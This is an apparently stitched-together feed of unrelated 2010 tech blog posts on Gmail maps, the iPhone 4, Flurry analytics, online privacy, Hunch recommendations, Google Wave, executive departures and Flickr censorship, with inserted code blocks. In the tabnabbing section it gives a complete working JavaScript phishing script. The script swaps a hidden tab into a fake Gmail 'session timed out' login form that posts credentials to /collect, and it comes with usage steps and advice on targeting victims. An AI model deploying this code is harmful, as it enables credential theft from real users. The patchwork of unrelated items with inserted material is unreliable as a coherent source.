Slap a Map Across Your Gmail or Buzz http://bit.ly/avrGdf
Google announced today that it has enabled a Google Maps preview in both Gmail and Google Buzz.
Now, instead of pasting a Google Map into an email you send, any Google Maps URL and any U.S. address (for the time being) you enclose will automatically come with a map embedded.
To enable the function in your Gmail, click the Google Labs settings tab and select "Google Maps previews in mail." Once that is enabled, any Google Maps URL will be mapped. For the time being, only U.S. addresses are being extracted, but, according to Google software engineer Mark Knichel, the team is working on giving the extraction process a global reach.
When it comes to Google Buzz, pasting a Google Maps link into the post box will cause the system to automatically produce an image preview of that location.
The iPhone 4 is here now and it's all that we had hoped for and...well, that's about it. Apple's now predictable keynote began with stats, ended with "one more thing" and detailed a few highlights throughout regarding the company's latest creation, the iPhone 4.
But one thing didn't happen today: we weren't blown away. We weren't surprised. We didn't jump up and down, screaming. We don't even know if we'll rush right out and get one.
In fact, we might just skip the iPhone altogether and get an Android phone instead.
Blame Gizmodo if you will, for spoiling all our fun with their spy shots of the iPhone prototype "found" in a bar. But we don't think that was the problem. No, the problem is that iPhone has lost its edge. Meanwhile, Android is killing it.
Case in point, here's the conversation this blogger had with the spouse:
Me: It's only $199 to upgrade my iPhone!
Him: Is it 4G?
Me: No.
Him: What's cool about it?
Me: Um, it's got a better camera. And it's faster. And it has a 3-axis gyro thingy.
Him: What's that?
Me: This thing for games, it helps when you rotate the phone, the game rotates.
Him: That's cool, but you don't really play games, do you?
Me: Not really. But it has HD video recording!
Him: So does your camera.
Me: And threaded email...And video chat!
Him: Over 3G?
Me: Well, no. Over Wi-Fi. And only with other iPhones. But EVO has Qik, and that works over 4G, actually. Hmm, maybe I should just get an EVO.
In fact, maybe I just will.
While I'm at it, here are a few more things that Apple didn't announce today:
No, it was not the "iPhone 4G," it was the iPhone 4. Why? Because AT&T isn't set to roll out its 4G network until next year. And Apple didn't surprise us by finally confirming the mythical Verizon iPhone, not that we expected it at this point. But still. Where's my iPhone 4G already?
Sure, Apple just bought Lala.com, but couldn't they have at least teased us about the forthcoming "cloud iTunes?" After all, that's what Google did. At its recent I/O conference, Google announced that an upcoming version of the Android Market would allow music and app downloads and automatic over-the-air sync. Is Apple even thinking about doing this? We have no idea.
FaceTime, Apple's new mobile iChat-like application, will probably be fun, but it's not game-changing. It only works over Wi-Fi for one thing (thanks, AT&T), not 3G. Meanwhile, Qik and Fring already have video chat apps for Android and Skype is hinting at an Android app arriving this year. Oh, and Qik on EVO offers 4G video chat, too.
In the current version of the Android operating system (the operating system!), there's a feature that lets an Android phone function as a mobile hotspot. Carriers can choose to implement this feature or not. The iPhone, meanwhile, can be tethered for $20 extra per month via USB or Bluetooth on AT&T.
Apple wants to compete with Google, but still charges $99/year for MobileMe (for the smallest package) while Google gives away its low-end services for free. That's not working for us either.
Trying to stop your dangerous texting-while-driving habit? Better get an Android phone. Although universal voice input is probably coming to the iPhone thanks to Apple's acquisition of Siri, a cutting-edge, voice-based digital assistant, it's not here yet. When is it arriving, though? Apple's reluctance to disclose future plans has us, again, looking to Android, which does this right now.
Navigation on the iPhone? There's an app for that! Yep, but it's not free. Google, meanwhile, offers Google Maps Navigation for free on all Android phones. Apple, either provide your own app or make nice with Google and use theirs, for goodness' sake.
We were halfway hoping that the recent news about Apple killing off all the "dashboard" apps on the iPhone and iPad meant the company was going to launch its own dashboard-like app similar to Android's widgets. Guess we were wrong here, too.
All this being said, the iPhone 4 is still a great smartphone thanks to other hardware-based innovations like its "retina display" (326 pixels per inch!), its integrated antennas, and its glass and stainless steel casing housing the thinnest iPhone to date: 9.3 mm thick. But now that the hardware has been modernized, maybe Apple can focus on the software?
iPhone Letdown? 8 Things Apple Didn't Announce
RT @timyoung: Social Networks Spur the Demise of Email in the Workplace - http://bit.ly/dituh9
RT @piercedavid: Digitizd Plus: Print-By-Email Coming from HP http://dgtz.me/cGA75r
Adam Lisagor makes some astute points based on his recent use of the iPad as a TV device:
However, when the iPad came, I found myself watching TV shows more often on it than on my TV. My preferred experience is to obtain TV content on my Mac, use software like the brilliant Air Video to convert it on-the-fly and stream it to my iPad, and watch in bed with my headphones while my girlfriend sleeps or watches her stories. If this isn’t the most thoroughly engaging way to take in video, I don’t know what is. And funny enough, when it’s time for a communal viewing experience, we’ll put it on the good ol’ TV.
What I started to notice about those newly rare occasions when the TV came back on, aside from their quaintness, was how much TV viewing actually promotes passivity in viewership. I feel my body become inert, my eyes, focused on a plane at a middle distance, I feel a tangible blankness to the experience, as though I’m close enough to partake, but far enough not to have to engage. I exit my body and look at myself from the outside, a 30-yard expressionless stare, and it’s a wonder we’ve let this thing dictate such vast portions of our lives for so long. Not to get all heavy.
Contrast that with the physical positioning of a personal video screen like the iPad, where our focus is forced to converge at a plane we’re more accustomed to for active participation, like reading or email or work or cat videos. I’m no scientist, but I’m guessing there are some psychological implications to the distance at which our eyes spend their time focusing as we engage with the world. And to my mind, holding a 10” screen a foot from my face in a dark room is more immersive than staring blankly at a 40” screen twelve feet away.
My point is, different-sized screens will always play roles in our media diets. But we should expect those roles to shift as technology does.
Cognitive scientists have learned that we reason differently when reading on our computer than when reading books (see Lifestreaming At The Edge), apparently engaging more of the 'executive function' that involves more critical thinking. Perhaps there is a similar effect here, where changing the nature of the experience changes in a basic way how we process it, and the nature of the benefits.
I also like Adam's conjectures about the direction for Apple TV, and how it might play with iPad. I am still holding off on the iPad until it has a webcam in it, though.
Apple to Flurry: Kiss Our Data Good-bye http://bit.ly/d8zE5l
Much of the great mobile data we analyze comes from analytics firms, among them Flurry, which entices developers to use tracking codes within mobile applications that its software captures and sends back to the company. Flurry then uses the data to provide detailed information on, for example, which handset makers have the most market share or what platforms have the most apps. Based on comments made by Steve Jobs last night at the All Things D conference, however, when it comes to the iPhone, that practice is about to undergo a major change.
When asked about handset analytics, Jobs specifically mentioned Flurry by name:
“Some company called Flurry had data on devices that we were using on our campus — new devices. They were getting this info by getting developers to put software in their apps that sent info back to this company! So we went through the roof. It’s violating our privacy policies, and it’s p***ing us off! So we said we’re only going to allow analytics that don’t give our device info — only for the purpose of advertising.”
The situation has Jobs upset for at least two reasons: First, companies like Flurry (and developers that use Flurry’s services) don’t have to wait around at a bar to find out about the next super-secret iPhone — by collecting device data through installed software, analytics firms can glean Apple’s future hardware and software plans in advance. Secondly, there’s no simple opt-out method for consumers, who may not even realize that their device-specific data is going to a third-party.
Flurry’s VP of marketing, Peter Farago, told Om via email that Flurry is changing practices in light of Apple’s position — and to some degree, had done so prior to Jobs calling out Flurry last night. Indeed, on May 13, Flurry announced a Privacy First Initiative “aimed at increasing consumer privacy standards in mobile application data collection and targeting.” Clear opt-out messages, non-granular geographic data and data deletion are among the new privacy activities that will take effect this summer.
That may help stem Jobs’ anger for now, but it wouldn’t surprise me if Apple continues to further clamp down on third-party analytics activities. Flurry says that it will comply with Apple’s wishes and no longer provide aggregated usage statistics, but if that’s the case, it will lose one of the most valuable pieces of its current offerings.
Disclosure: The GigaOM iPhone application uses Flurry to track application usage metrics.

Your business has a core, a goal, a challenge and a deliverable. There is probably one thing that would transform your project, one success that changes things, one hurdle that's tougher than the others. What's difficult, what would respond to overwhelming attention? That's the core.
Getting from here to there involves making sales, delivering on promises, overcoming the Dip and shipping.
Along the way, there are supporting tasks you can engage in, things you can do to make the goal easier to achieve.
A popular blog might gain attention and then trust and ultimately help you sell more widgets.
A lot of followers online might give you permission to tell a story that gets you better employees.
A vibrant party at SXSW can create buzz that gives your salespeople entree to important meetings.
These aren't trivial activities. In fact, they're part of what marketing means today. But...
But if they give you and your team an outlet to avoid the difficult work of achieving your goal ("I can't go to that sales call, I'm busy uploading pictures of last night's party to the blog and then tweeting out the url") then you're not building, you're hiding. Rich calls this playing with turtles. The thing is, the turtles are alive, and they're going to demand a lot from you.
There's a huge downside here: once your side activity gets going, it will lead to crises (we have an urgent email we have to answer), to feelings of abandonment (hey, you haven't been on the forum lately!), to irresistible offers to have the CEO speak or get people involved. There will always be a feeling of sunk cost, of opportunities missed and of things on the verge because these are human movements, not paid ads.
Two choices:
1. Find a way to make your goal completely aligned with the tactics you use to achieve it. What's good for your blog is good for your business.
2. Now that these approaches are working, and working incredibly well, it's time to come up with boundaries so the tail doesn't end up wagging the dog.
We’re adding broadband connections to our televisions, our phones, our reading devices and our game consoles these days, to the point that we expect such connections in almost everything we own. But while connectivity is awesome 90 percent of the time, it’s also scary because it can turn what were once private habits such as reading a book or answering email into something social — in some cases, without us knowing.
It also allows advertisers to better track our activities and to offer up personalized ads. Thanks to more gadgets with a web connection, we all live in glass houses where friends, neighbors, advertisers and potentially the government can see what we’re up to. What’s worse is that the records of our daily activities aren’t a transitory blip; they’re kept for months on end and can be searched, resold or shared.
Sure, your glass house has a great view of the world, and the ability to let your friends know what TV show you’re watching so they can share the experience is nice. But sometimes — perhaps for no other reason than a desire to be alone — you might want to close the drapes.
I place very high value on the notion of privacy. It disturbs me to find that Amazon might be sharing my anonymized highlighting of my Kindle books with the world — not because I’m learning how to make a bomb or reading Harlequin romance books — but because reading is a private activity for me. I’m similarly disturbed when a company that’s already pushing my comfort zone on privacy says one thing, but is apparently doing another.
If we’re going to live in glass houses, here’s what we need as connected consumers:
Transparency: Services shouldn’t say one thing but do another. Nor should they explain what they share in convoluted or complicated terms. And given how fast things change online, when privacy policies are amended, users need to be explicitly told (GigaOM Pro, sub req’d).
Standards: We need the companies that want to use and share our information to agree on terms, and market the heck out of them as a means to educate consumers. IP addresses, for example, are generally considered anonymous but they can be traced back to a household. Consumers need to know that. They also need to get a real sense of other potentially invasive ways tech can track them and understand which ones matter. Having a unified schema for entering and storing data would also help because it would enable users to move their information to other providers and perhaps shop around on the basis of privacy.
Control: I think we’re in many ways having the wrong debate over privacy. Most people don’t know what’s being shared, which means they don’t know what to do about it and instead, just freak out. If you give people information in a standardized format suddenly they can have control — they can decide what to share and with whom.
Having control may not mean that a consumer opts into sharing information through an arduous, click-filled process, but with enough transparency and standard language, can tell immediately what’s going to be shared upon signing up. In many ways the Internet is about the ability to access information or services easily and virally, and opt-ins create a barrier to entry that’s pretty high for businesses. Plus, the expectation that has developed around the Internet is that it’s easy to sign up and share information, but you need to clearly tell people what’s happening and offer them a way out before they share more than they intended.
A Line of Demarcation: How much someone is willing to share online is pretty personal. Already I share more online than I ever thought I would, while I’m sure my daughter, who is now three, will share even more. But as we connect financial and health information to the Internet through broadband-connected medical devices and online health records, we need to set limits as to who owns those records and how they can be accessed.
I think that data should belong explicitly to the user and methods to read it should be interoperable so that it can be shared at will with service providers when needed, while the user retains control. There is no sharing without an explicit opt-in.
Clearly this isn’t going to stop egregious violations of privacy, such as photos of a dead teen being posted online despite the family’s wishes, and it doesn’t mean one shouldn’t exercise common sense when, say, pondering whether or not you should post that pic of your friend drinking.
One way or another, instead of debating the nebulous issue of whether we share too much, we need to talk about how to set standards and educate consumers. Only then will we be able to have a healthy debate over what privacy practices we need in a connected age. We live in glass houses — let’s accept that and start shopping for blinds.
RT @hackernewsbot: Perfect email regex finally found... http://fightingforalostcause.net/misc/2006/compare-email-regex.php
Comparing E-mail Address Validating Regular Expressions
If You Like Moustaches on Men - You'll Love These Restaurants http://bit.ly/cjEfjx
Cross reference a person's Twitter friendships with their Foursquare favorites with their Hunch.com articulated "taste graph" and what do you get? Interesting personalized restaurant recommendations, for one thing.
Taste-gathering startup Hunch is experimenting with a recommendation service that cross references social graph connections on other services with the large set of unusual questions its users have answered. Questions like "do you like facial hair on men? Yes? Well, 48% of our users have said that." The end result is a simple prototype website where you enter a city and your Twitter username and Hunch will show you Foursquare venues it thinks you'll like. Or at least it thinks that people on Hunch who are like your friends on Twitter tend to like those places, on Foursquare. Crazy? Maybe not.

Restaurant recommendations are just the beginning. Hunch knows a lot about a lot of people. The company recently said that the average Hunch user has answered 152 personal questions about themselves. Now that data and our corresponding friend connections are going to be the basis for personalized recommendations. Want to see how well the company thinks it understands you? Check out the recently launched Hunch Twitter predictor game. It's downright eerie.
Hunch co-founder Chris Dixon explained (vaguely) what's going on by email.
We developed the technology to project and propagate our taste data using graph-like connections via public APIs. In this case we propagate our taste profiles to Twitter by projecting the subset of Hunch users connected with twitter onto all Twitter users. Then we propagate this taste data to Foursquare by projecting the subset of Twitter users checking in on foursquare onto all Foursquare venues. With our collection of taste profiles, in real time we can calculate affinities between any Hunch user, Twitter user, and Foursquare venue. As we project and propagate across all the web's entities, we will enable crazy data mashups. It's going to be cool!
In other words, if Hunch doesn't know about you well enough to make Foursquare recommendations via a Twitter account that's tied to both Foursquare and Hunch, then it will assume you are like those Twitter friends of yours who are on Hunch, and Foursquare.
That's the kind of data-driven value that making all these connections explicit will allow. The future will look like a big algorithm and interface war between companies battling it out to better serve you based on commonly, publicly available user data. Or data you selectively expose in return for recommendations.
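A toy version of the two-hop projection Dixon describes (Hunch profile to Twitter user to Foursquare venue), added here as an example and not Hunch's own code. Every user, question, follow and check-in is constructed sample data, and the example also makes the privacy point concrete: the handle `dave` never answered a Hunch question, yet receives a taste profile and venue ranking purely from whom he follows.

```javascript
// Added example, not Hunch's code. Constructed sample data throughout.

// Hunch taste profiles keyed by Twitter handle (users who linked Hunch and Twitter).
// Each answer is +1 (yes) or -1 (no).
const hunchProfiles = {
  alice: { facialHair: 1, spicyFood: 1, lateNights: -1 },
  bob: { facialHair: -1, spicyFood: 1, lateNights: 1 },
  carol: { facialHair: 1, spicyFood: -1, lateNights: -1 },
};

// Public Twitter follow graph: handle -> handles it follows.
const twitterFollows = {
  dave: ['alice', 'bob', 'erin'], // dave has no Hunch account
  erin: ['carol'],
};

// Foursquare check-ins: venue -> Twitter handles observed checking in there.
const foursquareCheckins = {
  'Mustache Grill': ['alice', 'carol'],
  'Pepper Palace': ['bob'],
  'Quiet Cafe': ['carol'],
};

// Average a list of profiles question by question (a missing answer counts as 0).
function meanProfile(profiles) {
  if (profiles.length === 0) return null;
  const sum = {};
  for (const profile of profiles) {
    for (const [question, answer] of Object.entries(profile)) {
      sum[question] = (sum[question] || 0) + answer;
    }
  }
  for (const question of Object.keys(sum)) sum[question] /= profiles.length;
  return sum;
}

// Hop 1: a Twitter user's taste profile. Known Hunch users keep their own answers;
// everyone else inherits the mean of the people they follow who are on Hunch
// (a single hop, so each inference stays traceable to direct friends).
function twitterProfile(handle) {
  if (hunchProfiles[handle]) return hunchProfiles[handle];
  const friends = (twitterFollows[handle] || []).filter((f) => hunchProfiles[f]);
  return meanProfile(friends.map((f) => hunchProfiles[f]));
}

// Hop 2: a venue's taste profile, the mean over the (projected) profiles of the
// Twitter users who checked in there.
function venueProfile(venue) {
  const profiles = (foursquareCheckins[venue] || [])
    .map(twitterProfile)
    .filter((p) => p !== null);
  return meanProfile(profiles);
}

// Affinity is a dot product over shared questions: agreement counts positive,
// disagreement negative.
function affinity(a, b) {
  let total = 0;
  for (const [question, answer] of Object.entries(a)) {
    if (question in b) total += answer * b[question];
  }
  return total;
}

// Venues ranked for a Twitter handle, best affinity first; empty when nothing can
// be inferred about the handle at all.
function recommend(handle) {
  const me = twitterProfile(handle);
  if (me === null) return [];
  const ranked = [];
  for (const venue of Object.keys(foursquareCheckins)) {
    const profile = venueProfile(venue);
    if (profile !== null) ranked.push({ venue, affinity: affinity(me, profile) });
  }
  return ranked.sort((x, y) => y.affinity - x.affinity);
}

console.log('dave (no Hunch account):', recommend('dave'));
console.log('erin:', recommend('erin'));
```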
Google Wave is now officially one year old today, but despite Google’s admirable year long dedication to Wave as well as opening it up to anyone with a Google account last week at Google I/O, we’re wondering if people are ever going to show up to the party.
Yes, Google has gone to great lengths to say that Wave is being used by schools, for collaboration, at conferences, etc., but many of these uses seem to be for academics/education, and not the general public. Certainly, people receive a better education when they collaborate, but there were plenty of existing online collaboration tools available to educators long before Wave debuted. Heard of IM?
Wave has the same problem one year in as it did when it launched – it doesn’t really meet any real needs. We have phones, Skype and IM for real-time communication, we’ve got Google Docs to collaboratively edit docs online, we’ve got picture and video sharing services, and yes, we have email, which in case you haven’t forgotten was supposed to be made obsolete by Wave. Even a one year old can figure out that that hasn’t happened.
To help the earthquake response in Haiti, Crisis Camps sprung up all over the world to crowdsource and map information coming from the disaster zone. During the first day of camps, many people suggested that volunteers use Wave to collaborate, but it quickly became apparent that it just didn’t do anything better than other existing tools (including Etherpad, which Google acquired to integrate into Wave). It’s true that a few people did decide to push forward using Wave, but the vast majority of the volunteers didn’t.
That said, we at The Next Web use Wave to coordinate our weekly podcast – but while it does the job, it doesn’t particularly do the job better than email or our internal social network would.
Wave is an experiment, and Google would be best served if it keeps that in mind. Perhaps it will attract a loyal following among academics and educators, and frankly, that’s not a bad thing – online collaboration software for education is a big (not Google big, but still big) business and if Wave can help people to get a better education, then it will have found a noble existence.
However, Google is in the fight of its life with Apple right now, and it needs to focus its energies like never before, so most likely Wave will never get out of Labs, will get a cult following from people that get it and that will be it. Email is safe for a while yet.
If Google continues to push Wave as a revolutionary product that everyone will one day use, on the other hand, they could end up with cake on their faces.
Google Wave is 1 year old today, but will anybody show up to the party?
Another longtime Yahoo exec is departing – this time Tapan Bhat, who had purview over the Internet giant’s important front page.
The news of the departure came in an internal email from new Chief Product Officer Blake Irving, titled “Busy Week” that highlighted the Yahoo (YHOO) investor day that took place yesterday.
Buried at the end of the memo was a paragraph noting “there’s always a downside to a productive week,” and saying that Bhat had decided to leave the company.
Bhat’s team will report to Yahoo exec Jeff Kinder until a replacement is found. It is not clear
Bhat joins a number of top execs who have clocked out of Yahoo of late, such as U.S. advertising head Joanne Bradford.
Bhat was in charge of a range of products at Yahoo, most importantly, the most recent redesign of its powerful homepage a year ago.
Yahoo has since confirmed the departure.
“Tapan Bhat, SVP, Integrated Consumer Experiences, has decided to leave Yahoo!. Tapan has been an integral leader within the Products organization since joining Yahoo! more than five years ago and we value his many contributions and wish him well. His last day will be June 15.”
And from Bhat:
“Leaving Yahoo! has been a difficult decision to make because I’m incredibly proud of the work that’s been accomplished by my teams over the last five years, particularly related to the Yahoo! homepage, My Yahoo!, our content optimization engine and most recently, our Mobile and iPad apps. I’m looking forward to new challenges that lie ahead and am confident that I’m leaving Yahoo! on the right path, and with the right leadership in place.”
According to some sources inside and outside of Yahoo, Bhat has clashed with CEO Carol Bartz at times, and also has long been considering a new move.
Read more of this story at Slashdot.
Unlock Your Hotel Room with Your Cell Phone is a post from Chris Pirillo
I hate traveling. I love the places that I visit and the people I interact with when I get there. It’s the actual travel part that gets to me every time. There’s always such a rush to do everything, you know? Checking into my hotels is probably my least favorite task. God love ‘em for what they do, but the desk clerks always make me batty. They’re always so helpful and happy. I know, it’s a good thing that they’re good at what they do. But when I check in, I’m usually frazzled and just want to pass out on my bed. Like all of you, though, I have to stand in line and then go through the entire process while talking to someone who is entirely too perky. InterContinental Hotels understands my frustrations, and is working on a plan to change things drastically.

Next month, InterContinental Hotels Group will start testing new technology at two of their Holiday Inn locations which allows guests to use their smartphones to unlock the doors to their rooms.
IHG exec Bryson Koehler thinks that the phones may be the perfect answer for weary (and harried) travelers. “The proliferation of smartphones is growing in such a way that we have to look at what people are already bringing with them to make their stay more enjoyable,” he said. “We don’t need to burden people with additional items; it just clutters up their lives. The beauty of the smart phone is that they’ve already got it.”
The test will begin in June at the Holiday Inn Chicago O’Hare Rosemont and the Holiday Inn Express Houston Downtown Convention Center. To join the trial, participants will need to download an Open Ways app to their phone. Guests will call up the confirmation email on their screen and hold it up to a sensor on the door, which will automagically unlock it.
What are your thoughts on this? If you have a smartphone and travel often, is this something you feel you would take advantage of?
By now, all but the most geriatric Web users know about phishing. Usually it takes the form of a seemingly-official email from a bank or other money-related Web service. Most of the time these attacks are painfully obvious -- but what if you removed the email attack vector? What if you removed those daft give-away URLs? What if the phishing attack was pure, seemingly-benign JavaScript that's invisible to all but the most judicious of Web users?
That's exactly what 'tabjacking' does. Open Aza Raskin's proof of concept in a new tab. Admire the sample code. Now, change tabs, wait five seconds, and then watch in horror as his site seemingly becomes GMail.
Tabjacking: a new and ingenious phishing attack originally appeared on Download Squad on Tue, 25 May 2010 11:00:00 EST.
In a surprising turn of events, Facebook CEO Mark Zuckerberg has responded personally to the recent privacy complaints.
Facebook has been through an intense week of criticism and debate over its privacy issues and its recent move to make everyone’s Facebook info public unless they choose to flick the settings back again – something which is unfortunately not very easy to do.
In an email to tech celeb Robert Scoble, Zuckerberg says that the company will be announcing changes this week and wants to make sure that they “get this stuff right this time”.
There are two ways to see this form of personal response. One, as one commenter put it, Zuckerberg is using Scoble as a tool to essentially put himself and Facebook in a better light with early adopters and tech fanatics (most of Scoble’s readers and followers are). The other is to see this as a genuine attempt to accept there have been problems and reach out to calm fears by personally contacting someone who Zuckerberg knows many (of the right) people trust.
Full email posted below, more discussion from us to come.
Hey,
We’ve been listening to all the feedback and have been trying to distill it down to the key things we need to improve. I’d like to show an improved product rather than just talk about things we might do.
We’re going to be ready to start talking about some of the new things we’ve built this week. I want to make sure we get this stuff right this time.
I know we’ve made a bunch of mistakes, but my hope at the end of this is that the service ends up in a better place and that people understand that our intentions are in the right place and we respond to the feedback from the people we serve.
I hope we’ll get a chance to catch up in person sometime this week. Let me know if you have any thoughts for me before then.
Mark
Microsoft is losing two high-profile executives. Both J. Allard, "Chief Experience Officer" and Entertainment and Devices Division CTO, and Robbie Bach, President of the Entertainment and Devices Division, are leaving the company per a Steve Ballmer email from this morning. These are the guys behind the Xbox, Zune, Project Natal, and the dead Courier project -- so basically all of Microsoft's hit entertainment projects from the last decade.
From: Steve Ballmer
Sent: Tuesday, May 25, 2010 11:01 AM
To: Microsoft - All Employees (QBDG)
Subject: Executive Leadership Transitions
After almost 22 years with the company, Robbie Bach has decided to retire from Microsoft. I have worked with Robbie during his entire tenure at Microsoft, and count him as both a friend and a great business partner and leader. Robbie has always had great timing, and is going out on a high note - this has been a phenomenal year for E&D overall, and with the coming launches of both Windows Phone 7 and "Project Natal," the rest of the year looks stupendous as well. While we are announcing Robbie's retirement today, he will remain here through the fall, ensuring we have a smooth transition.
RT @NeilHinrichsen: Security: "A New Type of Phishing Attack". Whoa this is very subtle and clever. Especially relevant to bank phishing. http://bit.ly/aUvD4A
The web is a generative and wild place. Sometimes I think I missed my calling; being devious is so much fun. Too bad my parents brought me up with scruples.
Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.
What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. That’ll catch us by surprise.
We’ll call this new type of phishing attack “tabnabbing”.
There are many ways to potentially improve the efficacy of this attack.
Using my CSS history miner you can detect which site a visitor uses and then attack that site (although this is no longer possible in Firefox betas). For example, you can detect if a visitor is a Facebook user, Citibank user, Twitter user, etc., and then switch the page to the appropriate login screen and favicon on demand.
Even more deviously, there are various methods to know whether a user is currently logged into a service. These methods range from timing attacks on image loads to seeing where errors occur when you load an HTML web page in a script tag*. Once you know which services a user is currently logged in to, the attack becomes even more effective.
[*] Think of looking for the exact error thrown when embedding <script src="http://gmail.com"/>: it will differ depending on whether the user is logged in or logged out.
You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.

Every time you include a third-party script on your page, or a Flash widget, you leave yourself wide open to an evildoer using your website as a staging ground for this kind of attack. If you are the evildoer, you can have this behavior occur only once in a while, and only if the user uses a targeted service. In other words, it can be hard to detect.
You can also use a cross-site scripting vulnerability to have other websites perform the attack for you. And for browsers that do not support changing the favicon, you can use a location.assign call to navigate the page to a controlled domain that serves the correct favicon. As long as the user wasn’t looking at the tab when the refresh occurred (which they won’t be), they’ll have no idea what hit them. Combine this with look-alike Unicode domain names and even the most savvy user will have trouble detecting that anything is amiss.
You can try it out on this very website (I’ve only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.
It’s hard to find, isn’t it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail, which loads slowly. It would be better to recreate the page in HTML.
You can get the source code here: bgattack.js.
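The mechanics described above (wait until the tab has been out of view for a few seconds, then swap title, favicon and page body, with the location.assign fallback for browsers that cannot change favicons), as an added example written for this page. It is not the post's bgattack.js and not Mozilla's code. The lure contents, the favicon path, the look-alike URL and all function names are this example's own assumptions. The decision logic is kept pure so it runs under Node; the DOM wiring at the bottom only executes in a browser.

```javascript
// Added example (not the original post's bgattack.js): a small, testable model
// of tabnabbing. Timing/decision logic is pure; DOM wiring runs only in a browser.
// Assumed/hypothetical: LURE contents, favicon path, look-alike URL, all names.

const NAB_DELAY_MS = 5000; // the post says to stay away "for at least five seconds"

// Hypothetical lure. A real attacker would pick it per visitor (history sniffing,
// login detection); here it is fixed to the Gmail-style lure the post uses, with
// the "your session timed out, re-authenticate" copy trick the post recommends.
const LURE = {
  title: 'Gmail: Email from Google',
  favicon: '/assets/lure-favicon.ico',           // attacker-hosted copy (assumed path)
  body: '<h1>Your session has timed out.</h1>' +
        '<form action="/collect" method="post">' +
        '<input name="user" placeholder="Email"> ' +
        '<input name="pass" type="password" placeholder="Password"> ' +
        '<button>Sign in</button></form>',
};

// Pure state machine. Feed it hide/show events and periodic ticks (millisecond
// timestamps); tick() returns true exactly once, when the tab has been out of
// view for at least delayMs. Coming back early cancels the pending swap.
function createNabber(delayMs = NAB_DELAY_MS) {
  let hiddenSince = null;
  let nabbed = false;
  return {
    onHidden(now) { if (!nabbed && hiddenSince === null) hiddenSince = now; },
    onVisible()   { hiddenSince = null; },
    tick(now) {
      if (nabbed || hiddenSince === null) return false;
      if (now - hiddenSince < delayMs) return false;
      nabbed = true;
      return true;
    },
    isNabbed() { return nabbed; },
  };
}

// Describe the swap as data. If the browser cannot change favicons dynamically,
// fall back to the post's location.assign() trick: jump to a look-alike domain
// that serves the right favicon natively.
function nabPlan(lure, { canChangeFavicon = false, lookalikeUrl = null } = {}) {
  if (!canChangeFavicon) return { navigateTo: lookalikeUrl };
  return { title: lure.title, favicon: lure.favicon, body: lure.body };
}

// Apply the plan to a document and location (real, or fakes as in the test).
function applyPlan(plan, doc, loc) {
  if (plan.navigateTo) { loc.assign(plan.navigateTo); return; }
  doc.title = plan.title;
  let icon = doc.querySelector('link[rel~="icon"]');
  if (!icon) {
    icon = doc.createElement('link');
    icon.rel = 'icon';
    doc.head.appendChild(icon);
  }
  icon.href = plan.favicon;
  doc.body.innerHTML = plan.body;
}

// Browser wiring: blur/focus is what was available in 2010; visibilitychange is
// the modern equivalent. Skipped entirely under Node.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const nabber = createNabber();
  window.addEventListener('blur',  () => nabber.onHidden(Date.now()));
  window.addEventListener('focus', () => nabber.onVisible());
  document.addEventListener('visibilitychange', () =>
    document.hidden ? nabber.onHidden(Date.now()) : nabber.onVisible());
  const timer = setInterval(() => {
    if (nabber.tick(Date.now())) {
      clearInterval(timer);
      applyPlan(nabPlan(LURE, { canChangeFavicon: true }), document, window.location);
    }
  }, 250);
}
```

Drop the script into an otherwise innocuous page, open it, switch tabs for more than five seconds and come back: title, favicon and body now read as the lure. The one thing the swap cannot change is the address bar, which is why the post's defensive conclusion is that the browser, not the user's eye for a login form, has to be the thing that knows which site a credential belongs to.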
This kind of attack once again shows how important our work is on the Firefox Account Manager to keep our users safe. User names and passwords are not a secure method of doing authentication; it’s time for the browser to take a more active role in being your smart user agent; one that knows who you are and keeps your identity, information, and credentials safe.
A New Type of Phishing Attack "tabnabbing" - Chris Hofmann
A new type of phishing attack. Works on savvy users. - Jim Bergman
I'm looking for a VP Marketing for a NYC-based company in the online advertising business. If you are or know of a person who has significant experience in marketing to online agencies and their clients, please get in touch with me.
You can do that by sending me an email to me here.
I'd love a link to a linkedin in the email if possible.
Thanks!
Is the iPhone Heading to Sprint? is a post from Chris Pirillo
Rumors have been floating around the Internet for what seems like forever, speculating as to when the iPhone will appear on the Verizon network. Today, however, TechUpdate says that the phone will be heading to Sprint sometime this summer. According to the story, a Best Buy employee in Pennsylvania told them that displays for the “iPhone 4G” will hit the shelves about the time that WWDC begins. Could this be true?

While I’m not sure we can believe some anonymous Best Buy employee, it does make sense to me. Sprint boasts the only 4G network thus far, offered in selected cities of the United States, which gives speeds of up to 10 Mbit/s. If the rumor is true, this means that a purported 4G iPhone would actually live up to its name. According to an email received by TechUpdate president Henry D’Andrea:
They’ve begun to grease the wheels for advertising. There is no news in regards to a Verizon version however. In regards to why it is moving to another carrier, our mobile manager speculates that Apple wanted to drop AT&T due to their poor service but managed to opt-out of the rest of their contract in exchange for the iPad service deal.
There is, of course, no proof given to back up these statements. The employee states he cannot supply it due to “privacy concerns” with their vendors. He also refused to identify which Best Buy he works for, in order to remain anonymous… and to keep his job, I’m sure. It will be interesting to see how this develops in the coming weeks.
What do you think? Will we be seeing the iPhone on the Sprint network in the near future?
See that photo above?
It’s of a painting by the famous artist Jules-Joseph Lefebvre that hangs in the Art Institute of Chicago. It was painted in 1874. I took it last year when I visited the museum. It’s also a photo of mine that is presently being censored by Flickr. Apparently showing full frontal cock on Michelangelo’s David on Flickr is ok, but showing the backside of a woman from an 1874 painting is not. After they censored it I sent them an email saying, “c’mon guys, really?” trying to have the censorship decision appealed. But after getting my email they told me that it needed to remain censored.
So let me ask you this. Which is more offensive, a photograph from a painting in a public all ages gallery in one of the finest cultural institutions in the world, or Yahoo CEO Carol Bartz very publicly telling Mike Arrington to “Fuck Off” at a crowded technology conference?
Another friend of mine had over 25,000 photographs of mannequins online. Flickr didn’t like that some of his mannequins apparently showed a little nipple so they just censored all 25,000 photos in his stream. Wouldn’t want anyone being offended now by seeing a little nipple on a mannequin that sits on a public street seen by thousands of people a day.
